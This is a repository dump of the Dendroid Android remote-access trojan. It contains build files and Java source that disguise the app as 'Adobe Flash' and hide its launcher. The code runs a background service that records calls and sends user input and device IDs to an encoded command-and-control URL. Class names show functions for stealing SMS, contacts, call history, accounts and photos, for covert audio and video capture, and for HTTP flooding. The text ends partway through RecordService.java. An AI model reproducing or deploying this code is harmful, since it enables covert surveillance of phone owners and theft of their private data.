APK/bin/classes/com/connect/DroidianService$getCallHistory.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$getContacts.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$getContacts.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$getInboxSms.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$getInboxSms.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$getInstalledApps.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$getInstalledApps.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$getSentSms.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$getSentSms.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$getUserAccounts.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$getUserAccounts.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$httpFlood.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$httpFlood.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$mediaVolumeDown.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$mediaVolumeDown.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$mediaVolumeUp.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$mediaVolumeUp.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$openApp.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$openApp.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$openDialog.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$openDialog.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$openWebpage.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$openWebpage.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$promptUninstall.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$promptUninstall.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$recordAudio.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$recordAudio.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$ringerVolumeDown.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$ringerVolumeDown.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$ringerVolumeUp.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$ringerVolumeUp.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$screenOn.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$screenOn.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$sendContactsText.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$sendContactsText.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$sendText.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$sendText.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$takePhoto.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$takePhoto.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$takeVideo.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$takeVideo.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$transferBot.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$transferBot.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService$uploadPictures.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService$uploadPictures.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/DroidianService.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/DroidianService.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/PhoneListener.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/PhoneListener.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/RecordService.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/RecordService.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/ServiceReceiver.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/ServiceReceiver.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/UpdateApp.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/UpdateApp.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/connect/VideoView.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/connect/VideoView.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/hidden/droidian/BuildConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/hidden/droidian/BuildConfig.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/hidden/droidian/R$attr.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/hidden/droidian/R$attr.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/hidden/droidian/R$drawable.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/hidden/droidian/R$drawable.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/hidden/droidian/R$id.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/hidden/droidian/R$id.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/hidden/droidian/R$layout.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/hidden/droidian/R$layout.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/hidden/droidian/R$menu.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/hidden/droidian/R$menu.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/hidden/droidian/R$string.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/hidden/droidian/R$string.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/hidden/droidian/R$style.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/hidden/droidian/R$style.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/classes/com/hidden/droidian/R.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/classes/com/hidden/droidian/R.class -------------------------------------------------------------------------------- /master/Dendroid APK/bin/dexedLibs/android-support-v4-fb20f63c61b92fcce3b50ef3e17f2541.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/dexedLibs/android-support-v4-fb20f63c61b92fcce3b50ef3e17f2541.jar -------------------------------------------------------------------------------- /master/Dendroid APK/bin/dexedLibs/annotations-e291b16be4bd9579572c3fa2e74c9160.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/dexedLibs/annotations-e291b16be4bd9579572c3fa2e74c9160.jar -------------------------------------------------------------------------------- /master/Dendroid APK/bin/dexedLibs/httpmime-4.0-182cc6914ce4f0f38af3e59230326182.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/dexedLibs/httpmime-4.0-182cc6914ce4f0f38af3e59230326182.jar -------------------------------------------------------------------------------- /master/Dendroid APK/bin/jarlist.cache: -------------------------------------------------------------------------------- 1 | # cache for current jar dependency. DO NOT EDIT. 2 | # format is 3 | # Encoding is UTF-8 4 | -------------------------------------------------------------------------------- /master/Dendroid APK/bin/res/crunch/drawable-hdpi/launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/res/crunch/drawable-hdpi/launcher.png -------------------------------------------------------------------------------- /master/Dendroid APK/bin/res/crunch/drawable-ldpi/launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/res/crunch/drawable-ldpi/launcher.png -------------------------------------------------------------------------------- /master/Dendroid APK/bin/res/crunch/drawable-mdpi/launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/res/crunch/drawable-mdpi/launcher.png -------------------------------------------------------------------------------- /master/Dendroid APK/bin/res/crunch/drawable-xhdpi/launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/bin/res/crunch/drawable-xhdpi/launcher.png -------------------------------------------------------------------------------- /master/Dendroid APK/gen/com/hidden/droidian/BuildConfig.java: -------------------------------------------------------------------------------- 1 | /** Automatically generated file. DO NOT MODIFY */ 2 | package com.hidden.droidian; 3 | 4 | public final class BuildConfig { 5 | public final static boolean DEBUG = true; 6 | } -------------------------------------------------------------------------------- /master/Dendroid APK/gen/com/hidden/droidian/R.java: -------------------------------------------------------------------------------- 1 | /* AUTO-GENERATED FILE. DO NOT MODIFY. 2 | * 3 | * This class was automatically generated by the 4 | * aapt tool from the resource data it found. It 5 | * should not be modified by hand. 6 | */ 7 | 8 | package com.hidden.droidian; 9 | 10 | public final class R { 11 | public static final class attr { 12 | } 13 | public static final class drawable { 14 | public static final int launcher=0x7f020000; 15 | } 16 | public static final class id { 17 | public static final int blankImage=0x7f070001; 18 | public static final int screen=0x7f070002; 19 | public static final int surface_camera=0x7f070000; 20 | } 21 | public static final class layout { 22 | public static final int cameraview=0x7f030000; 23 | public static final int main=0x7f030001; 24 | public static final int videoview=0x7f030002; 25 | } 26 | public static final class menu { 27 | public static final int connect_layout=0x7f060000; 28 | } 29 | public static final class string { 30 | public static final int app_name=0x7f040000; 31 | public static final int menu_settings=0x7f040001; 32 | public static final int title_activity_connect=0x7f040002; 33 | } 34 | public static final class style { 35 | public static final int AppTheme=0x7f050000; 36 | public static final int Invisible=0x7f050001; 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /master/Dendroid APK/ic_launcher-web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/ic_launcher-web.png -------------------------------------------------------------------------------- /master/Dendroid APK/libs/android-support-v4.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/libs/android-support-v4.jar -------------------------------------------------------------------------------- /master/Dendroid APK/libs/httpmime-4.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/libs/httpmime-4.0.jar -------------------------------------------------------------------------------- /master/Dendroid APK/lint.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /master/Dendroid APK/proguard-project.txt: -------------------------------------------------------------------------------- 1 | # To enable ProGuard in your project, edit project.properties 2 | # to define the proguard.config property as described in that file. 3 | # 4 | # Add project specific ProGuard rules here. 5 | # By default, the flags in this file are appended to flags specified 6 | # in ${sdk.dir}/tools/proguard/proguard-android.txt 7 | # You can edit the include path and order by changing the ProGuard 8 | # include property in project.properties. 9 | # 10 | # For more details, see 11 | # http://developer.android.com/guide/developing/tools/proguard.html 12 | 13 | # Add any project specific keep options here: 14 | 15 | # If your project uses WebView with JS, uncomment the following 16 | # and specify the fully qualified class name to the JavaScript interface 17 | # class: 18 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview { 19 | # public *; 20 | #} 21 | #proguard.config=proguard.cfg -------------------------------------------------------------------------------- /master/Dendroid APK/project.properties: -------------------------------------------------------------------------------- 1 | # This file is automatically generated by Android Tools. 2 | # Do not modify this file -- YOUR CHANGES WILL BE ERASED! 3 | # 4 | # This file must be checked in Version Control Systems. 5 | # 6 | # To customize properties used by the Ant build system edit 7 | # "ant.properties", and override values to adapt the script to your 8 | # project structure. 9 | # 10 | # To enable ProGuard to shrink and obfuscate your code, uncomment this (available properties: sdk.dir, user.home): 11 | #proguard.config=${sdk.dir}/tools/proguard/proguard-android.txt:proguard-project.txt 12 | 13 | # Project target. 14 | target=android-10 15 | #dexguard.dir=/usr/local/dexguard 16 | #proguard.config=proguard.cfg 17 | -------------------------------------------------------------------------------- /master/Dendroid APK/res/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/res/.DS_Store -------------------------------------------------------------------------------- /master/Dendroid APK/res/drawable-hdpi/launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/res/drawable-hdpi/launcher.png -------------------------------------------------------------------------------- /master/Dendroid APK/res/drawable-ldpi/launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/res/drawable-ldpi/launcher.png -------------------------------------------------------------------------------- /master/Dendroid APK/res/drawable-mdpi/launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/res/drawable-mdpi/launcher.png -------------------------------------------------------------------------------- /master/Dendroid APK/res/drawable-xhdpi/launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/res/drawable-xhdpi/launcher.png -------------------------------------------------------------------------------- /master/Dendroid APK/res/layout/cameraview.xml: -------------------------------------------------------------------------------- 1 | 2 | 8 | 13 | 19 | -------------------------------------------------------------------------------- /master/Dendroid APK/res/layout/main.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | -------------------------------------------------------------------------------- /master/Dendroid APK/res/layout/videoview.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 12 | 13 | -------------------------------------------------------------------------------- /master/Dendroid APK/res/menu/connect_layout.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /master/Dendroid APK/res/values-v11/styles.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 12 | 13 | -------------------------------------------------------------------------------- /master/Dendroid APK/res/values-v14/styles.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 12 | 13 | -------------------------------------------------------------------------------- /master/Dendroid APK/res/values/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | Adobe Flash 4 | Settings 5 | Connect 6 | 7 | -------------------------------------------------------------------------------- /master/Dendroid APK/res/values/styles.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 12 | 13 | -------------------------------------------------------------------------------- /master/Dendroid APK/src/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/src/.DS_Store -------------------------------------------------------------------------------- /master/Dendroid APK/src/com/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid APK/src/com/.DS_Store -------------------------------------------------------------------------------- /master/Dendroid APK/src/com/connect/Dialog.java: -------------------------------------------------------------------------------- 1 | package com.connect; 2 | 3 | import java.io.InputStream; 4 | import java.io.UnsupportedEncodingException; 5 | import java.net.URLEncoder; 6 | import java.text.SimpleDateFormat; 7 | import java.util.Date; 8 | 9 | import org.apache.http.HttpResponse; 10 | import org.apache.http.client.HttpClient; 11 | import org.apache.http.client.methods.HttpGet; 12 | import org.apache.http.impl.client.DefaultHttpClient; 13 | 14 | import android.app.Activity; 15 | import android.app.AlertDialog; 16 | import android.content.Context; 17 | import android.content.DialogInterface; 18 | import android.content.Intent; 19 | import android.net.ConnectivityManager; 20 | import android.net.NetworkInfo; 21 | import android.os.Bundle; 22 | import android.preference.PreferenceManager; 23 | import android.provider.Settings.Secure; 24 | import android.util.Base64; 25 | import android.util.Log; 26 | import android.widget.EditText; 27 | 28 | public class Dialog extends Activity { 29 | private String URL; 30 | @SuppressWarnings("unused") 31 | private String password; 32 | 33 | @Override 34 | public void onCreate(Bundle savedInstanceState) { 35 | super.onCreate(savedInstanceState); 36 | 37 | try { 38 | URL = new String( Base64.decode( PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("URL", ""), Base64.DEFAULT )); 39 | password = new String( Base64.decode( PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("password", ""), Base64.DEFAULT )); 40 | } catch (Exception e1) {e1.printStackTrace();} 41 | 42 | Intent sender=getIntent(); 43 | String title = sender.getExtras().getString("Title"); 44 | String message = sender.getExtras().getString("Message"); 45 | 46 | AlertDialog.Builder alert = new AlertDialog.Builder(this); 47 | alert.setTitle(title); 48 | alert.setMessage(message); 49 | 50 | final EditText input = new EditText(this); 51 | alert.setView(input); 52 | 53 | alert.setNegativeButton("Cancel", new DialogInterface.OnClickListener() { 54 | public void onClick(DialogInterface dialog, int whichButton) { 55 | finish(); 56 | return; 57 | } 58 | }); 59 | 60 | alert.setPositiveButton("Ok", new DialogInterface.OnClickListener() { 61 | public void onClick(DialogInterface dialog, int whichButton) { 62 | String value = input.getText().toString(); 63 | Log.i("com.connect", "Alert: " + value); 64 | 65 | try { 66 | getInputStreamFromUrl(URL + PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("urlPost", "") + "UID=" + PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("AndroidID", "") + "&Data=", "Dialog Response: " + value); 67 | } catch (Exception e) { 68 | // TODO Auto-generated catch block 69 | e.printStackTrace(); 70 | } 71 | 72 | finish(); 73 | return; 74 | } 75 | }); 76 | 77 | alert.setCancelable(false); 78 | alert.show(); 79 | } 80 | 81 | public InputStream getInputStreamFromUrl(String urlBase, String urlData) throws UnsupportedEncodingException { 82 | 83 | // Log.d("com.connect", urlBase); 84 | Log.d("com.connect", urlData); 85 | 86 | SimpleDateFormat sdf = new SimpleDateFormat("yyyy_MM_dd_HH:mm:ss"); 87 | String currentDateandTime = "[" + sdf.format(new Date()) + "] - "; 88 | currentDateandTime = URLEncoder.encode (currentDateandTime, "UTF-8"); 89 | 90 | urlData = URLEncoder.encode (urlData, "UTF-8"); 91 | 92 | if(isNetworkAvailable()) 93 | { 94 | InputStream content = null; 95 | try 96 | { 97 | HttpClient httpclient = new DefaultHttpClient(); 98 | HttpResponse response = httpclient.execute(new HttpGet(urlBase + currentDateandTime+ urlData)); 99 | content = response.getEntity().getContent(); 100 | httpclient.getConnectionManager().shutdown(); 101 | } catch (Exception e) { 102 | } 103 | return content; 104 | } 105 | return null; 106 | } 107 | //******************************************************************************************************************************************************** 108 | public boolean isNetworkAvailable() { 109 | ConnectivityManager cm = (ConnectivityManager) getSystemService(Context.CONNECTIVITY_SERVICE); 110 | NetworkInfo networkInfo = cm.getActiveNetworkInfo(); 111 | if (networkInfo != null && networkInfo.isConnected()) { 112 | return true; 113 | } 114 | return false; 115 | } 116 | } -------------------------------------------------------------------------------- /master/Dendroid APK/src/com/connect/Droidian.java: -------------------------------------------------------------------------------- 1 | package com.connect; 2 | 3 | import android.app.Activity; 4 | import android.app.ActivityManager; 5 | import android.app.ActivityManager.RunningServiceInfo; 6 | import android.app.AlarmManager; 7 | import android.app.PendingIntent; 8 | import android.content.Context; 9 | import android.content.ContextWrapper; 10 | import android.content.Intent; 11 | import android.content.pm.PackageManager; 12 | import android.os.Bundle; 13 | import android.preference.Preference; 14 | import android.provider.SyncStateContract.Constants; 15 | import android.util.Log; 16 | import android.view.WindowManager; 17 | 18 | public class Droidian extends Activity { 19 | 20 | public void onCreate(Bundle savedInstanceState) { 21 | super.onCreate(savedInstanceState); 22 | getWindow().addFlags(WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE); 23 | getWindow().setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_ALWAYS_HIDDEN); 24 | PackageManager i = getApplicationContext().getPackageManager(); 25 | i.setComponentEnabledSetting(getComponentName(),PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP); 26 | 27 | if(isMyServiceRunning()==false) 28 | { 29 | startService(new Intent(getApplicationContext(), DroidianService.class)); 30 | Log.i("com.connect","startService"); 31 | } 32 | } 33 | private boolean isMyServiceRunning() { 34 | ActivityManager manager = (ActivityManager) getApplicationContext().getSystemService(Context.ACTIVITY_SERVICE); 35 | for (RunningServiceInfo service : manager.getRunningServices(Integer.MAX_VALUE)) { 36 | if (DroidianService.class.getName().equals(service.service.getClassName())) { 37 | return true; 38 | } 39 | } 40 | return false; 41 | } 42 | } -------------------------------------------------------------------------------- /master/Dendroid APK/src/com/connect/PhoneListener.java: -------------------------------------------------------------------------------- 1 | package com.connect; 2 | 3 | import android.content.Intent; 4 | import android.content.Context; 5 | import android.content.ComponentName; 6 | import android.preference.PreferenceManager; 7 | import android.telephony.TelephonyManager; 8 | import android.telephony.PhoneStateListener; 9 | import android.util.Log; 10 | 11 | public class PhoneListener extends PhoneStateListener 12 | { 13 | private Context context; 14 | 15 | public PhoneListener(Context c) { 16 | context = c; 17 | } 18 | 19 | public void onCallStateChanged (int state, String incomingNumber) 20 | { 21 | switch (state) { 22 | case TelephonyManager.CALL_STATE_IDLE: 23 | Boolean stopped = context.stopService(new Intent(context, RecordService.class)); 24 | 25 | break; 26 | case TelephonyManager.CALL_STATE_RINGING: 27 | break; 28 | case TelephonyManager.CALL_STATE_OFFHOOK: 29 | if(PreferenceManager.getDefaultSharedPreferences(context).getBoolean("RecordCalls", false)) 30 | { 31 | Intent callIntent = new Intent(context, RecordService.class); 32 | ComponentName name = context.startService(callIntent); 33 | if (null == name) { 34 | } else { 35 | } 36 | } 37 | break; 38 | } 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /master/Dendroid APK/src/com/connect/RecordService.java: -------------------------------------------------------------------------------- 1 | package com.connect; 2 | 3 | import java.io.File; 4 | import java.io.IOException; 5 | import java.io.InputStream; 6 | import java.io.UnsupportedEncodingException; 7 | import java.lang.Exception; 8 | import java.net.URLEncoder; 9 | import java.text.SimpleDateFormat; 10 | import java.util.Date; 11 | 12 | import org.apache.http.HttpResponse; 13 | import org.apache.http.client.HttpClient; 14 | import org.apache.http.client.methods.HttpGet; 15 | import org.apache.http.impl.client.DefaultHttpClient; 16 | 17 | import android.net.ConnectivityManager; 18 | import android.net.NetworkInfo; 19 | import android.os.IBinder; 20 | import android.app.Service; 21 | import android.preference.PreferenceManager; 22 | import android.util.Base64; 23 | import android.util.Log; 24 | import android.content.SharedPreferences; 25 | import android.content.Context; 26 | import android.content.Intent; 27 | import android.media.MediaRecorder; 28 | 29 | public class RecordService extends Service implements MediaRecorder.OnInfoListener, MediaRecorder.OnErrorListener 30 | { 31 | public final String DEFAULT_STORAGE_LOCATION = PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("File", "") + File.separator + "Calls" + File.separator; 32 | private MediaRecorder recorder = null; 33 | private boolean isRecording = false; 34 | private File recording = null;; 35 | private String URL; 36 | @SuppressWarnings("unused") 37 | private String password; 38 | 39 | private File makeOutputFile (SharedPreferences prefs) 40 | { 41 | 42 | try { 43 | URL = new String( Base64.decode( PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("URL", ""), Base64.DEFAULT )); 44 | password = new String( Base64.decode( PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("password", ""), Base64.DEFAULT )); 45 | } catch (Exception e1) {e1.printStackTrace();} 46 | 47 | File dir = new File(DEFAULT_STORAGE_LOCATION); 48 | 49 | if (!dir.exists()) { 50 | try { 51 | dir.mkdirs(); 52 | } catch (Exception e) { 53 | return null; 54 | } 55 | } else { 56 | if (!dir.canWrite()) { 57 | return null; 58 | } 59 | } 60 | 61 | SimpleDateFormat sdf = new SimpleDateFormat("yyyy_MM_dd_HH_mm"); 62 | String currentDateandTime = sdf.format(new Date()); 63 | 64 | try { 65 | return File.createTempFile(currentDateandTime, ".mpg", dir); 66 | } catch (IOException e) { 67 | return null; 68 | } 69 | } 70 | 71 | public void onCreate() 72 | { 73 | super.onCreate(); 74 | recorder = new MediaRecorder(); 75 | } 76 | 77 | public void onStart(Intent intent, int startId) { 78 | 79 | if (isRecording) return; 80 | 81 | Context c = getApplicationContext(); 82 | SharedPreferences prefs = PreferenceManager.getDefaultSharedPreferences(c); 83 | 84 | int audiosource = 1; 85 | int audioformat = 1; 86 | 87 | recording = makeOutputFile(prefs); 88 | if (recording == null) { 89 | recorder = null; 90 | return; 91 | } 92 | 93 | try { 